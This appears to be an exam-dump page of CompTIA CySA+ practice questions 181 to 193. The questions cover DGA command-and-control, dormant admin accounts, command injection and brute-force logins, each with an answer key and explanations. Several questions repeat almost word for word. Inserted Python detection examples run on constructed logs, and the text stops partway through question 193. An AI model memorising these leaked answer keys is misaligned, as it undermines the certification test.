CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 10 Q181-200


Question 181

A SOC analyst observes multiple endpoints in a subnet sending unusually high volumes of outbound DNS queries to external domains that appear randomized and high-entropy. Network logs also indicate outbound traffic over uncommon ports. Which of the following BEST describes this threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Misconfigured internal DNS server
C) Legitimate software updates
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

This scenario indicates a classic example of malware leveraging a domain generation algorithm (DGA) to maintain command-and-control (C2) communications. The combination of high-volume DNS queries to randomized, high-entropy domains and outbound traffic over uncommon ports is a hallmark of DGA activity. Attackers use DGAs to dynamically generate domain names that malware can contact to receive instructions or exfiltrate data, even if some domains are blocked.

DGAs enhance persistence and stealth. Traditional security tools relying on blacklists or signature-based detection struggle to keep pace with dynamically generated domains. These malware variants are frequently employed by advanced persistent threat (APT) actors, ransomware campaigns, and sophisticated botnets to maintain resilient communication channels with compromised hosts.

Detection requires correlating multiple layers of telemetry, including DNS query logs, network traffic patterns, and endpoint behavior. SIEM systems and EDR solutions are crucial for identifying anomalous patterns such as high-entropy DNS queries, abnormal query frequency, or outbound connections over unusual ports. Machine learning models can flag unusual patterns and entropy in DNS queries, helping distinguish malicious activity from normal traffic.

Mitigation involves immediate containment of affected endpoints, blocking identified domains and associated IP addresses, eradicating malware, and performing a thorough forensic investigation. Reverse-engineering the malware or analyzing its DGA logic can help predict future domain names, enabling proactive blocking before communication occurs. Network segmentation, strict egress filtering, and integration of threat intelligence feeds further enhance defenses.

B Misconfigured internal DNS server

While a misconfigured DNS server might generate abnormal traffic, it is unlikely to produce high-frequency queries to randomized, high-entropy domains combined with outbound traffic over uncommon ports.

C Legitimate software updates

Software updates generally communicate with known servers over standard ports. Randomized high-entropy domains and unusual traffic patterns are inconsistent with legitimate updates.

D Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm network resources or services to degrade availability rather than maintaining covert C2 communications.

Question 182

During an internal security review, an analyst discovers several privileged service accounts that have not been used in over nine months but retain administrative privileges. Which of the following controls MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable external SSH connections entirely
D) Deploy full disk encryption across all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts pose a significant security risk, providing potential attackers with an avenue to gain unauthorized access, maintain persistence, or escalate privileges. Automated account deprovisioning is the most effective control to address this risk because it ensures that accounts are disabled or removed after a defined period of inactivity, minimizing the attack surface and enforcing the principle of least privilege.

Integrating automated deprovisioning with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement and auditing. Regulatory compliance standards such as PCI DSS, HIPAA, and SOX often mandate strict control over privileged accounts and regular review of access privileges. Manual processes for deprovisioning are prone to human error and delays, potentially leaving dormant accounts exposed. Automation reduces these risks and ensures timely remediation.

Complementary security controls include implementing multi-factor authentication (MFA), enforcing role-based access control (RBAC), and conducting periodic privilege recertification. Continuous monitoring of account activity helps detect unauthorized attempts to access deprovisioned accounts. By combining these measures, organizations can significantly reduce the likelihood of compromised dormant accounts being used in attacks.

B Increase password complexity for service accounts

While strong passwords mitigate brute-force attacks, they do not address the core risk posed by dormant administrative accounts that remain active and accessible.

C Disable external SSH connections entirely

Restricting external SSH access reduces potential attack vectors from outside the network but does not address dormant accounts within the environment that can be exploited internally.

D Deploy full disk encryption across all endpoints

Full disk encryption protects data at rest but does not mitigate the risk associated with inactive privileged accounts, which could still be leveraged by attackers for unauthorized access or lateral movement.

Question 183

A penetration tester exploits a vulnerability in a web application that allows unsanitized user input to be executed at the operating system level. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when web applications fail to properly validate user input, allowing attackers to execute arbitrary commands on the underlying operating system. Implementing server-side input validation ensures that user input conforms to expected types, formats, and lengths. Parameterized commands or prepared statements separate user input from executable code, preventing it from being interpreted as commands.

Secure coding practices, including input validation, output encoding, and adherence to established frameworks, reduce the likelihood of introducing command injection vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) can help identify these vulnerabilities during development or prior to deployment.

Web application firewalls (WAFs) can provide an additional layer of protection by filtering requests that match known malicious patterns. Monitoring anomalous input attempts and logging these activities allow early detection of potential attacks. Remediation involves code updates, secure coding training for developers, and periodic penetration testing to verify that controls remain effective.

TLS encryption secures communication between clients and servers but does not prevent command injection. Increasing session timeout values reduces risk from session hijacking but does not address input validation vulnerabilities. Firewalls at the network layer cannot inspect application-layer input effectively, so they cannot prevent this type of vulnerability. Server-side input validation with parameterized commands is the most effective and direct mitigation control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent injection attacks at the application layer.

C Increase session timeout values

Adjusting session timeouts can reduce exposure to session hijacking but is ineffective against command injection vulnerabilities.

D Add additional firewall rules at the network perimeter

Network-layer firewalls cannot inspect application-layer input and therefore cannot prevent command injection attacks.

Question 184

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IP addresses. No files are detected on disk, and antivirus scans are clean. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate system tools such as PowerShell, WMI, or macros in Office applications to execute malicious actions. The presence of obfuscated scripts communicating with unknown external IPs without leaving files on disk is indicative of living-off-the-land malware. These threats are specifically designed to bypass traditional signature-based antivirus detection, which relies on identifying known malicious files.

Detection requires advanced monitoring and endpoint telemetry. Endpoint detection and response (EDR) solutions, behavioral analytics, and memory analysis are critical for identifying unusual script execution, anomalous network communications, and deviations from baseline behavior. Indicators of compromise (IOCs) include unexpected PowerShell processes, high-volume outbound traffic to unknown IPs, and abnormal system resource usage.

Mitigation involves immediate containment of affected endpoints, termination of malicious processes, forensic analysis of script behavior, and remediation through malware removal and patching of exploited vulnerabilities. Preventive strategies include enforcing least privilege, implementing application whitelisting, enabling PowerShell script block logging, enforcing execution policies, and integrating threat intelligence feeds to identify and block malicious domains.

A defense-in-depth approach, combining network segmentation, monitoring, user awareness, and incident response processes, is essential for effectively mitigating fileless malware. Unlike traditional ransomware, phishing attacks, or DDoS, fileless malware does not leave persistent files on disk, making it more difficult to detect and necessitating advanced security controls and proactive monitoring.

B Standard ransomware encrypting files

Ransomware operates by encrypting data on disk. In this case, no files were detected being encrypted, making ransomware unlikely.

C Phishing emails delivering malicious attachments

Phishing requires user interaction and delivery of malicious payloads. Memory-resident scripts running in PowerShell without file artifacts do not align with typical phishing behavior.

D Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources, not perform stealthy, memory-resident malicious activity using system tools.

Question 185

A SOC analyst detects multiple failed login attempts from several external IP addresses targeting privileged accounts. The attempts are high-frequency and follow predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware attempting to encrypt files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

The scenario describes a brute-force attack, where attackers systematically try multiple combinations of usernames and passwords to gain unauthorized access to privileged accounts. The high frequency, use of predictable username patterns, and external IP origins strongly indicate automation through scripts, bots, or distributed botnets rather than random human error.

Brute-force attacks are commonly used to compromise weak or reused passwords. Once an attacker gains access to privileged accounts, they can escalate privileges, move laterally across networks, deploy malware, exfiltrate data, or maintain persistence. Distributed brute-force attacks may originate from multiple IPs to evade IP-based blocking or rate-limiting controls.

Detection requires analyzing authentication logs for patterns of failed login attempts, geolocation anomalies, and unusual access times. Security tools such as SIEM and EDR can correlate these events across systems to identify potential brute-force campaigns.

Mitigation strategies include implementing account lockout policies after a defined number of failed attempts, enforcing strong password policies, requiring multi-factor authentication (MFA), rate-limiting login attempts, and integrating threat intelligence to block malicious IP addresses. Regular monitoring and alerting help respond promptly to ongoing attacks.

B Fileless malware executing in memory

Fileless malware does not typically generate repeated failed login attempts targeting multiple privileged accounts.

C Ransomware attempting to encrypt files

Ransomware focuses on encrypting data on disk and would not manifest as repeated login failures.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering and user interaction, not automated login attempts across multiple accounts.

Question 186

A SOC analyst observes unusual outbound traffic from multiple endpoints to an external IP address over non-standard ports. DNS logs indicate frequent queries to domains with high entropy. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Legitimate software updates
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured network monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed pattern strongly suggests malware utilizing a domain generation algorithm (DGA) to maintain communication with command-and-control (C2) servers. High-entropy DNS queries indicate that the malware dynamically generates domain names to contact its C2 infrastructure. This approach allows attackers to evade traditional blacklisting or signature-based defenses because the domain names change frequently.

DGAs are often used by advanced persistent threat (APT) actors, ransomware, and sophisticated botnets to maintain resilient and covert communication channels. Outbound traffic over non-standard ports further supports the likelihood of C2 communication rather than legitimate network operations. Detection relies on correlating DNS query patterns with network traffic, identifying high-entropy domains, and analyzing endpoint behavior.

Machine learning can aid in detecting anomalies in DNS query patterns and outbound traffic, allowing analysts to identify potential DGA activity. Mitigation includes isolating affected hosts, blocking known malicious domains, reverse-engineering the malware to predict future domains, and performing comprehensive forensic investigations. Threat intelligence feeds can provide actionable indicators of compromise (IOCs) to enhance proactive defenses.

B Legitimate software updates

Software updates generally communicate with known servers over standard ports. Randomized high-entropy domain queries are inconsistent with legitimate update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to disrupt availability by overwhelming services, not maintain covert C2 communication channels.

D Misconfigured network monitoring system

Misconfigurations might produce unusual traffic but rarely generate high-entropy domain queries combined with non-standard outbound connections.

Question 187

An analyst identifies multiple privileged accounts that have not been used for over a year. The accounts retain administrative privileges, and the organization lacks a structured review process. Which of the following controls MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption across endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts represent a critical security risk because attackers can exploit them to gain unauthorized access, persist in the environment, and move laterally. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, aligning with the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems enforces consistent policy application, auditability, and compliance with standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is error-prone, potentially leaving dormant accounts vulnerable. Automation ensures timely removal, reducing operational and security risk.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Automated deprovisioning reduces human error, improves accountability, and strengthens organizational security posture. Logging access attempts to deprovisioned accounts also helps detect insider threats or attempted compromise.

B Increase password complexity for service accounts

Strong passwords reduce the risk of brute-force attacks but do not address the inherent risk posed by inactive administrative accounts.

C Disable all external SSH access

Restricting SSH reduces external attack exposure but does not mitigate risks associated with dormant internal privileged accounts.

D Deploy full disk encryption across endpoints

Encryption protects data at rest but does not eliminate risks posed by unused high-privilege accounts.

Question 188

During a penetration test, testers exploit a web application vulnerability that allows arbitrary command execution via user input. Which control BEST mitigates this risk?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when user input is improperly handled, allowing attackers to execute arbitrary OS commands. Server-side input validation ensures that input adheres to expected types, formats, and lengths, preventing unexpected execution. Parameterized commands or prepared statements separate user input from executable code, eliminating opportunities for injection.

Secure coding practices, including input validation, output encoding, and adherence to secure development frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development or before deployment. Web application firewalls (WAFs) provide an additional layer, filtering requests with malicious patterns.

Monitoring input anomalies and logging suspicious requests allow early detection and response. Remediation includes updating application code, developer training on secure coding, and periodic penetration testing. TLS ensures data privacy but does not mitigate injection attacks. Network firewalls cannot inspect application-layer input effectively, making server-side validation with parameterized commands the most effective control.

B Enforce TLS encryption for web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent command injection.

C Increase session timeout values

Adjusting session timeouts reduces session hijacking risks but is ineffective against input validation vulnerabilities.

D Add additional firewall rules at the network perimeter

Network firewalls cannot prevent command injection because they operate primarily at layers 3–4 and cannot inspect application-layer input effectively.

Question 189

A SOC analyst observes obfuscated PowerShell scripts running on multiple endpoints communicating with unknown external IP addresses. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Ransomware encrypting files
C) Phishing campaigns with malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware executes in memory and uses legitimate system tools like PowerShell, WMI, or Office macros to perform malicious actions. Obfuscated scripts communicating with unknown external IPs without leaving files on disk indicate fileless malware or living-off-the-land techniques. Traditional signature-based antivirus solutions often fail to detect this threat due to its memory-resident nature.

Detection relies on behavioral monitoring, endpoint detection and response (EDR) solutions, and memory analysis. Indicators include abnormal PowerShell execution, unusual network connections, and deviations from established baselines. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for TTPs (tactics, techniques, and procedures), and remediating systems.

Preventive strategies include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, and execution policy enforcement. Threat intelligence integration enables blocking malicious domains or IPs. A defense-in-depth approach, combining monitoring, anomaly detection, user awareness, and incident response planning, is essential for effectively mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware does not persist on disk and leverages legitimate tools, making advanced monitoring and proactive defense essential.

B Ransomware encrypting files

Ransomware would leave detectable files being encrypted, which is not the case here.

C Phishing campaigns with malicious attachments

Phishing requires user interaction and delivery of payloads, inconsistent with memory-resident scripts running without disk artifacts.

D Distributed denial-of-service (DDoS) attack

DDoS targets resource availability and does not explain obfuscated scripts communicating externally without file artifacts.

Question 190

A SOC analyst detects multiple failed login attempts targeting administrative accounts from external IP addresses. The attempts are frequent and follow predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware encrypting files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

The scenario describes a brute-force attack, where attackers systematically attempt numerous username-password combinations to gain unauthorized access. High-frequency attempts, predictable usernames, and external IP origins indicate automation via scripts, bots, or distributed botnets rather than human error.

Brute-force attacks target weak or reused passwords, and compromised administrative accounts can allow attackers to escalate privileges, move laterally, deploy malware, exfiltrate sensitive data, or maintain persistence. Distributed attacks leverage multiple IPs to evade detection and rate-limiting.

Detection involves analyzing authentication logs for failed attempts, geolocation anomalies, and unusual access times. Security information and event management (SIEM) and endpoint detection and response (EDR) systems can correlate events across accounts and systems.

Mitigation strategies include account lockout policies, strong password enforcement, multi-factor authentication (MFA), rate-limiting login attempts, and threat intelligence integration to block known malicious IP addresses. Continuous monitoring and alerting allow rapid response to ongoing attacks.

B Fileless malware executing in memory

Fileless malware does not typically manifest as repeated failed login attempts targeting multiple privileged accounts.

C Ransomware encrypting files

Ransomware focuses on encrypting files and would not generate repeated login failures.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering, not automated login attempts across multiple accounts.
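The detection described in Questions 185 and 190 (failed-login patterns in authentication logs, correlated per source address and per targeted account) as an added worked example; this is not code from the original page. The sshd log lines are constructed, the privileged-user watch-list and the thresholds are assumed tuning values, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd authentication log (not from the original page). Source addresses use
# documentation ranges; 10.0.0.5 stands in for an internal workstation.
SAMPLE_AUTH_LOG = """\
Nov 12 03:14:01 bastion sshd[2211]: Failed password for root from 198.51.100.7 port 51022 ssh2
Nov 12 03:14:03 bastion sshd[2213]: Failed password for root from 198.51.100.7 port 51023 ssh2
Nov 12 03:14:05 bastion sshd[2215]: Failed password for root from 198.51.100.7 port 51024 ssh2
Nov 12 03:14:07 bastion sshd[2217]: Failed password for root from 198.51.100.7 port 51025 ssh2
Nov 12 03:14:09 bastion sshd[2219]: Failed password for root from 198.51.100.7 port 51026 ssh2
Nov 12 03:14:11 bastion sshd[2221]: Failed password for root from 198.51.100.7 port 51027 ssh2
Nov 12 03:15:00 bastion sshd[2230]: Failed password for invalid user administrator from 203.0.113.5 port 40001 ssh2
Nov 12 03:15:02 bastion sshd[2231]: Failed password for invalid user administrator from 203.0.113.6 port 40002 ssh2
Nov 12 03:15:04 bastion sshd[2232]: Failed password for invalid user administrator from 203.0.113.7 port 40003 ssh2
Nov 12 03:15:06 bastion sshd[2233]: Failed password for invalid user administrator from 203.0.113.8 port 40004 ssh2
Nov 12 03:20:30 bastion sshd[2240]: Failed password for alice from 10.0.0.5 port 50500 ssh2
Nov 12 03:20:41 bastion sshd[2241]: Accepted password for alice from 10.0.0.5 port 50500 ssh2
"""

FAILED_RE = re.compile(
    r"^(\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"
)
PRIVILEGED_USERS = {"root", "admin", "administrator"}  # assumed watch-list of privileged names


def parse_failed_login(line, year=2024):
    """Return (timestamp, user, source_ip) for a failed-login line, else None.
    Syslog timestamps carry no year, so one is assumed."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3)


def detect_bruteforce(log_text, window_s=60, per_ip_threshold=5, distributed_ip_threshold=3):
    """Sliding-window detection of the two patterns the question describes:
    - single_source: one IP exceeds per_ip_threshold failures within window_s seconds
    - distributed: one account sees failures from >= distributed_ip_threshold IPs within window_s
    Thresholds are assumed tuning values; each source and each account alerts at most once."""
    events = [e for e in (parse_failed_login(l) for l in log_text.splitlines()) if e]
    events.sort(key=lambda e: e[0])
    by_ip, by_user = defaultdict(deque), defaultdict(deque)
    alerted_ips, alerted_users, alerts = set(), set(), []
    for ts, user, ip in events:
        q = by_ip[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= per_ip_threshold and ip not in alerted_ips:
            alerted_ips.add(ip)
            alerts.append({"type": "single_source", "source": ip, "user": user,
                           "count": len(q), "privileged": user in PRIVILEGED_USERS})
        uq = by_user[user]
        uq.append((ts, ip))
        while (ts - uq[0][0]).total_seconds() > window_s:
            uq.popleft()
        sources = sorted({src for _, src in uq})
        if len(sources) >= distributed_ip_threshold and user not in alerted_users:
            alerted_users.add(user)
            alerts.append({"type": "distributed", "user": user, "sources": sources,
                           "privileged": user in PRIVILEGED_USERS})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The single successful login by alice after one failure produces no alert, which is the false-positive case a lockout policy must also tolerate.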

Question 191

A SOC analyst observes unusual outbound connections from endpoints to multiple external IP addresses over high-numbered, non-standard ports. DNS logs indicate frequent queries to domains with randomized characters. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured network monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed combination of high-volume outbound traffic to multiple external IPs, non-standard port usage, and high-entropy DNS queries strongly suggests malware leveraging a domain generation algorithm (DGA) for command-and-control (C2) communication. DGAs are designed to generate pseudo-random domain names at predefined intervals, allowing malware to maintain resilient and covert channels with its C2 infrastructure even if some domains are blocked or taken down.

This technique is commonly used by advanced persistent threats (APTs), ransomware campaigns, and botnets. Attackers can evade signature-based security solutions and static blacklists because the domain names continuously change. DGAs also complicate forensic investigation, as the dynamic domains make it difficult to trace the attacker’s infrastructure or preemptively block communication channels.

Detection strategies include correlating network traffic with DNS logs, analyzing patterns for high entropy, monitoring endpoint behaviors, and leveraging machine learning models to identify abnormal query patterns. A combination of endpoint detection and response (EDR), intrusion detection systems (IDS), and threat intelligence feeds can provide early warning indicators.

Mitigation involves immediate containment of affected hosts, blocking malicious domains and IP addresses, removing malware, and conducting a thorough forensic investigation. Reverse-engineering the DGA can allow defenders to predict future domains for proactive blocking. Network segmentation, egress filtering, and behavioral analytics provide additional layers of defense, helping prevent lateral movement or data exfiltration.

B Routine software update traffic

Legitimate software updates typically communicate with known servers over standard ports and do not generate randomized domain queries.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming resources to degrade availability, not maintaining covert C2 communication channels.

D Misconfigured network monitoring system

While misconfigurations can generate unusual traffic, they rarely produce high-frequency, high-entropy DNS queries alongside non-standard outbound connections.
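The detection logic described in Questions 181, 186 and 191 (entropy of queried names, correlated with egress on uncommon ports per client) as an added worked example; this is not code from the original page. The resolver and flow log lines are constructed, the entropy and vowel-ratio thresholds and the list of common egress ports are assumed tuning values, and the one-label public-suffix rule is a simplification of what a production tool would do.

```python
import math
import re
from collections import defaultdict

# Constructed sample logs (not from the original page). 203.0.113.10 and 198.51.100.9 are
# documentation addresses standing in for external destinations.
# Resolver query log: "<epoch> <client_ip> <queried_name>"
SAMPLE_DNS_LOG = """\
1700000000 10.0.5.21 www.example.com
1700000001 10.0.5.21 xk3j9fq2l7vb8z.com
1700000002 10.0.5.21 p0w9ez7rt4hmq1.net
1700000003 10.0.5.21 a8s7d6f5g4h3j2.org
1700000004 10.0.5.21 q1w2e3r4t5y6u7.info
1700000005 10.0.5.21 zx9cv8bn7ml6kj.com
1700000006 10.0.5.42 mail.example.com
1700000007 10.0.5.42 login.microsoftonline.com
1700000008 10.0.5.42 cdn.example.com
"""
# Egress flow log: "<epoch> <src_ip> <dst_ip> <dst_port>"
SAMPLE_FLOW_LOG = """\
1700000010 10.0.5.21 203.0.113.10 8443
1700000011 10.0.5.21 203.0.113.10 6667
1700000012 10.0.5.42 198.51.100.9 443
1700000013 10.0.5.42 198.51.100.9 443
"""
COMMON_EGRESS_PORTS = {25, 53, 80, 123, 443, 587, 993}   # assumed baseline for this network


def shannon_entropy(s):
    """Bits per character; log2(len(s)) when every character is distinct, 0.0 when empty."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(name):
    """Label left of the public suffix ('example' for www.example.com). A one-label suffix is
    assumed; production code would consult the Public Suffix List for names like co.uk."""
    parts = name.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_suspicious_name(name, entropy_threshold=3.2, min_len=10):
    """Entropy alone also flags long dictionary words, so require a second DGA trait:
    few vowels or several digits. Thresholds are assumed tuning values."""
    label = registrable_label(name)
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    digits = sum(ch.isdigit() for ch in label)
    return shannon_entropy(label) >= entropy_threshold and (vowel_ratio < 0.25 or digits >= 3)


def suspicious_names_by_client(dns_log):
    """Distinct DGA-like names queried by each client."""
    names = defaultdict(list)
    for line in dns_log.splitlines():
        _, client, qname = line.split()
        if is_suspicious_name(qname) and qname not in names[client]:
            names[client].append(qname)
    return names


def uncommon_egress_by_client(flow_log, common_ports=COMMON_EGRESS_PORTS):
    """(destination, port) pairs per client that fall outside the common-port baseline."""
    flows = defaultdict(set)
    for line in flow_log.splitlines():
        _, src, dst, port = line.split()
        if int(port) not in common_ports:
            flows[src].add((dst, int(port)))
    return flows


def detect_dga_clients(dns_log, flow_log, min_names=3):
    """Clients that queried >= min_names DGA-like domains; severity rises when the same client
    also opened egress connections on uncommon ports, the combination the question describes."""
    flows = uncommon_egress_by_client(flow_log)
    findings = {}
    for client, names in suspicious_names_by_client(dns_log).items():
        if len(names) >= min_names:
            egress = sorted(flows.get(client, ()))
            findings[client] = {"suspicious_domains": names, "uncommon_egress": egress,
                                "severity": "high" if egress else "medium"}
    return findings


if __name__ == "__main__":
    for client, f in detect_dga_clients(SAMPLE_DNS_LOG, SAMPLE_FLOW_LOG).items():
        print(client, f["severity"], len(f["suspicious_domains"]), f["uncommon_egress"])
```

Note that login.microsoftonline.com scores above the entropy threshold on its own; the vowel-ratio check is what keeps it out of the findings.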

Question 192

An analyst identifies multiple privileged accounts that have not been used in over a year. These accounts retain administrative privileges, and no review process is in place. Which control MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption across endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts pose significant security risks because attackers can exploit them to gain unauthorized access, maintain persistence, and escalate privileges. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, minimizing the attack surface and enforcing the principle of least privilege.

Integrating deprovisioning with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is error-prone and may leave dormant accounts vulnerable. Automation ensures timely removal, reducing operational risk and enhancing overall security posture.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts helps detect potential insider threats or attempted compromise.

B Increase password complexity for service accounts

While strong passwords mitigate brute-force attacks, they do not eliminate the risk posed by inactive administrative accounts.

C Disable all external SSH access

Restricting SSH access reduces external exposure but does not mitigate risks from dormant internal privileged accounts.

D Deploy full disk encryption across endpoints

Encryption protects data at rest but does not reduce the risk associated with unused high-privilege accounts.
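The automated deprovisioning control recommended in Questions 182, 187 and 192 as an added worked example of the policy logic; this is not code from the original page. The directory export, the 90-day inactivity limit, the break-glass exception list and the fixed clock are all constructed assumptions; the script decides and records actions but does not itself talk to a directory.

```python
import csv
import io
from datetime import datetime, timedelta, timezone

# Constructed directory export (not from the original page). 'admin_groups' lists privileged
# group memberships separated by ';'; an empty last_logon means the account never logged on.
ACCOUNT_EXPORT = """\
sam_account,enabled,admin_groups,last_logon,when_created
svc_backup,true,Domain Admins,2023-01-15T08:00:00Z,2020-03-01T00:00:00Z
svc_etl,true,,2024-11-01T12:00:00Z,2021-06-10T00:00:00Z
svc_legacy_sql,true,Domain Admins;Server Operators,,2022-02-02T00:00:00Z
breakglass01,true,Domain Admins,2022-05-05T00:00:00Z,2019-01-01T00:00:00Z
alice.admin,true,Domain Admins,2024-11-10T09:30:00Z,2018-09-09T00:00:00Z
svc_old_web,false,Domain Admins,2022-08-01T00:00:00Z,2020-01-01T00:00:00Z
"""

NOW = datetime(2024, 11, 12, tzinfo=timezone.utc)  # fixed clock so the run is reproducible
INACTIVITY_LIMIT = timedelta(days=90)              # assumed policy threshold
BREAK_GLASS = {"breakglass01"}                     # assumed documented exceptions: reviewed, never auto-disabled


def parse_ts(value):
    """Parse an ISO-8601 UTC timestamp, or return None for an empty field."""
    if not value:
        return None
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def evaluate_accounts(export_text, now=NOW, limit=INACTIVITY_LIMIT):
    """Return the deprovisioning actions the policy requires for one export snapshot.
    Only enabled accounts holding privileged group membership are in scope; idle time is measured
    from last logon, or from creation for accounts that have never logged on (a common gap when
    a rule keys only on last_logon)."""
    actions = []
    for row in csv.DictReader(io.StringIO(export_text)):
        enabled = row["enabled"].strip().lower() == "true"
        groups = [g for g in row["admin_groups"].split(";") if g]
        if not enabled or not groups:
            continue
        last = parse_ts(row["last_logon"])
        basis = "last_logon" if last else "when_created"
        idle = now - (last or parse_ts(row["when_created"]))
        if idle <= limit:
            continue
        action = {"account": row["sam_account"], "idle_days": idle.days, "basis": basis}
        if row["sam_account"] in BREAK_GLASS:
            action.update(action="review", reason="break-glass exception requires manual recertification")
        else:
            action.update(action="disable", remove_groups=groups,
                          reason=f"privileged account idle > {limit.days} days")
        actions.append(action)
    return actions


def audit_lines(actions, now=NOW):
    """Render actions as audit-log lines so every automated change is traceable."""
    stamp = now.strftime("%Y-%m-%dT%H:%M:%SZ")
    return [f"{stamp} deprovision account={a['account']} action={a['action']} "
            f"idle_days={a['idle_days']} basis={a['basis']} reason=\"{a['reason']}\""
            for a in actions]


if __name__ == "__main__":
    print("\n".join(audit_lines(evaluate_accounts(ACCOUNT_EXPORT))))
```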

Question 193

During a penetration test, testers exploit unsanitized input fields in a web application that allow arbitrary command execution. Which control BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when web applications fail to properly handle user input, allowing attackers to execute arbitrary OS-level commands. Server-side input validation ensures all user input conforms to expected types, lengths, and formats, while parameterized commands or prepared statements prevent user input from being interpreted as executable code.

Secure coding practices, such as input validation, output encoding, and adherence to secure development frameworks, reduce the likelihood of introducing command injection vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development or before deployment. Web application firewalls (WAFs) add another layer of protection by filtering known malicious patterns.

Monitoring and logging anomalous input attempts provide early detection, while remediation includes updating application code, training developers in secure coding practices, and performing periodic penetration testing to verify control effectiveness. TLS secures data in transit but does not prevent command injection. Network firewalls cannot inspect application-layer input, making server-side validation with parameterized commands the most effective mitigation.

B Enforce TLS encryption for web traffic

TLS provides confidentiality and integrity of communications but does not mitigate input validation vulnerabilities.

C Increase session timeout values

